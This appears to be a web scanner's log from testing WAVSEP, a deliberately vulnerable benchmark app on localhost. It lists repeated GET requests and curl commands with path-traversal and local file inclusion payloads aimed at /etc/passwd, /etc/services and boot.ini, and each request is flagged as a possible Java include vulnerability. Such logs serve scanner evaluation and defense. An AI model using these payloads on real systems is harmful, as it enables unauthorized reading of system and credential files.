curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
